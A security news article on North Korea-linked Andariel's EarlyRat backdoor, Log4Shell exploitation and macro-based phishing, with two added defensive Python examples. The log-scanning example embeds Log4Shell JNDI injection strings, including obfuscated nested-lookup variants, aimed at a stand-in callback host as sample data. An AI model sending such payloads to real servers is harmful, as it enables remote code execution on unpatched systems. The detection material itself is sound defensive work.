The North Korea-aligned threat actor tracked as Andariel leveraged a previously undocumented malware called EarlyRat in attacks exploiting the Log4j Log4Shell vulnerability last year.
“Andariel infects machines by executing a Log4j exploit, which, in turn, downloads additional malware from the command-and-control (C2) server,” Kaspersky said in a new report.
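The first stage of the chain described above is a Log4Shell lookup string arriving in an HTTP request field that the vulnerable server logs. From the defender's side, the practical check is to scan access or reverse-proxy logs for `${jndi:` lookups and, because real probes nest `${lower:}`, `${upper:}` and `${::-}` lookups to defeat naive substring matching, to flatten those lookups before matching. The detector below is an added example, not code from Kaspersky's report; the log lines and the 198.51.100.7 callback host are constructed sample data.

```python
import re
from dataclasses import dataclass
from typing import List

# Constructed sample access-log lines (not taken from the Kaspersky report). The User-Agent
# field is a common injection point for Log4Shell lookup strings; lines 2 and 3 use nested
# lookups that defeat a naive "${jndi:" substring match, and line 4 is benign traffic.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Jun/2022:12:00:01 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.6 - - [10/Jun/2022:12:00:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${lower:r}mi://198.51.100.7/x}"',
    '10.0.0.7 - - [10/Jun/2022:12:00:03 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${::-j}${::-n}di:ldap://198.51.100.7/o}"',
    '10.0.0.8 - - [10/Jun/2022:12:00:04 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0)"',
]

# ${lower:x} and ${upper:x} resolve to the literal text x, so flatten them to x.
CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
# ${name:-x}, including the empty-name form ${::-x}, resolves to the default value x.
DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
# After flattening, a real lookup reads ${jndi:<scheme>://<host>...}.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/}\s]+)", re.IGNORECASE)


@dataclass
class Log4ShellHit:
    line_no: int   # 1-based index into the input
    scheme: str    # ldap, rmi, dns, ...
    host: str      # callback host[:port] the victim would be made to contact
    decoded: str   # the log line after lookup flattening


def flatten_lookups(text: str, max_rounds: int = 10) -> str:
    """Resolve nested lower/upper/default lookups from the inside out until nothing changes."""
    for _ in range(max_rounds):
        resolved = CASE_LOOKUP.sub(lambda m: m.group(1).lower(), text)
        resolved = DEFAULT_LOOKUP.sub(lambda m: m.group(1), resolved)
        if resolved == text:
            break
        text = resolved
    return text


def find_log4shell_attempts(lines: List[str]) -> List[Log4ShellHit]:
    """Return one hit per line that carries a JNDI lookup once obfuscating lookups are flattened."""
    hits = []
    for line_no, raw in enumerate(lines, start=1):
        decoded = flatten_lookups(raw)
        m = JNDI_LOOKUP.search(decoded)
        if m:
            hits.append(Log4ShellHit(line_no, m.group(1).lower(), m.group(2), decoded))
    return hits


if __name__ == "__main__":
    for hit in find_log4shell_attempts(SAMPLE_LOGS):
        print(f"line {hit.line_no}: jndi lookup via {hit.scheme} to {hit.host}")
```

The extracted scheme and host are the useful output: the host is the attacker-controlled server the vulnerable JVM would contact, so it is the value to hunt for in outbound connection logs and to block at the egress firewall. A hit in the logs proves an attempt, not a successful exploitation; whether the server was patched or whether an outbound LDAP/RMI connection followed decides that.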
Also known as Silent Chollima and Stonefly, Andariel is associated with North Korea's Lab 110, a primary hacking unit that also houses APT38 (aka BlueNoroff) and other subordinate elements collectively tracked under the umbrella name Lazarus Group.
The threat actor, apart from conducting espionage attacks against foreign government and military entities that are of strategic interest, is known to carry out cyber crime as an additional source of income for the sanctions-hit nation.
Some of the key cyber weapons in its arsenal include a ransomware strain referred to as Maui and numerous remote access trojans and backdoors such as Dtrack (aka Valefor and Preft), NukeSped (aka Manuscrypt), MagicRAT, and YamaBot.
NukeSped contains a variety of features to create and terminate processes and move, read, and write files on the infected host. The use of NukeSped overlaps with a campaign tracked by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) under the name TraderTraitor.
Andariel's weaponization of the Log4Shell vulnerability in unpatched VMware Horizon servers was previously documented by AhnLab Security Emergency Response Center (ASEC) and Cisco Talos in 2022.
The latest attack chain discovered by Kaspersky shows that EarlyRat is propagated by means of phishing emails containing decoy Microsoft Word documents. The files, when opened, prompt the recipients to enable macros, leading to the execution of VBA code responsible for downloading the trojan.
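The macro-based delivery above only works if the VBA project reaches the user and the user clicks through the macro prompt, so a mail gateway or triage script can cut the chain earlier by classifying Word attachments by their contents rather than their extension. The helper below is an added example, not code from the report: it builds a constructed minimal OOXML package in memory (a real Word file carries many more parts) and checks for the `word/vbaProject.bin` part and the macro-enabled main content type, and flags the legacy OLE2 binary format for separate handling.

```python
import io
import zipfile
from typing import Dict

OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # legacy binary Office container (.doc)
ZIP_MAGIC = b"PK\x03\x04"                            # OOXML (.docx/.docm) is a zip package
MACRO_PART = "word/vbaProject.bin"                   # the part that holds a VBA project
MACRO_MAIN_TYPE = "application/vnd.ms-word.document.macroEnabled.main+xml"
PLAIN_MAIN_TYPE = "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"


def build_sample_word_package(with_macro: bool) -> bytes:
    """Constructed minimal OOXML package for the demo; real Word files carry many more parts."""
    buf = io.BytesIO()
    main_type = MACRO_MAIN_TYPE if with_macro else PLAIN_MAIN_TYPE
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as pkg:
        pkg.writestr(
            "[Content_Types].xml",
            '<?xml version="1.0" encoding="UTF-8"?>'
            '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
            f'<Override PartName="/word/document.xml" ContentType="{main_type}"/>'
            "</Types>",
        )
        pkg.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            # A real vbaProject.bin is an OLE2 compound file; only the magic matters here.
            pkg.writestr(MACRO_PART, OLE2_MAGIC + b"\x00" * 16)
    return buf.getvalue()


def office_macro_indicators(data: bytes) -> Dict[str, bool]:
    """Classify an attachment by content, never by its file extension."""
    result = {
        "is_ooxml": False,
        "is_legacy_binary": False,
        "has_vba_project": False,
        "macro_enabled_content_type": False,
    }
    if data.startswith(OLE2_MAGIC):
        # Legacy .doc: VBA lives inside the OLE2 streams; hand it to an OLE parser such as oletools.
        result["is_legacy_binary"] = True
        return result
    if not data.startswith(ZIP_MAGIC):
        return result
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as pkg:
            names = set(pkg.namelist())
            result["is_ooxml"] = "[Content_Types].xml" in names
            result["has_vba_project"] = MACRO_PART in names
            if result["is_ooxml"]:
                content_types = pkg.read("[Content_Types].xml").decode("utf-8", "replace")
                result["macro_enabled_content_type"] = MACRO_MAIN_TYPE in content_types
    except zipfile.BadZipFile:
        pass  # corrupt or truncated archive: nothing to conclude from the package structure
    return result


def should_quarantine(data: bytes) -> bool:
    """Policy hook: hold anything that carries a VBA project or declares itself macro-enabled."""
    ind = office_macro_indicators(data)
    return ind["has_vba_project"] or ind["macro_enabled_content_type"]


if __name__ == "__main__":
    for label, sample in (("macro", build_sample_word_package(True)),
                          ("plain", build_sample_word_package(False))):
        print(label, office_macro_indicators(sample), "quarantine:", should_quarantine(sample))
```

Checking both the part name and the content type matters: either one alone can be present in a crafted package, and a package that is internally inconsistent is itself worth a closer look. Blocking macros from Internet-sourced files at the endpoint is the complementary control, since it removes the "enable macros" decision from the recipient.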
Described as a simple but limited backdoor, EarlyRat is designed to collect and exfiltrate system information to a remote server as well as execute arbitrary commands. It also shares high-level similarities with MagicRAT, not to mention being written using a framework called PureBasic. MagicRAT, on the other hand, employs the Qt Framework.
Another feature of the intrusion is the use of legitimate off-the-shelf tools like 3Proxy, ForkDump, NTDSDumpEx, Powerline, and PuTTY for further exploitation of the target.
“Despite being an APT group, Lazarus is known for performing typical cybercrime tasks, such as deploying ransomware, which makes the cybercrime landscape more complicated,” Kaspersky said. “Also, the group uses a wide range of custom tools, constantly updating existing and developing new malware.”
Some parts of this article are sourced from:
thehackernews.com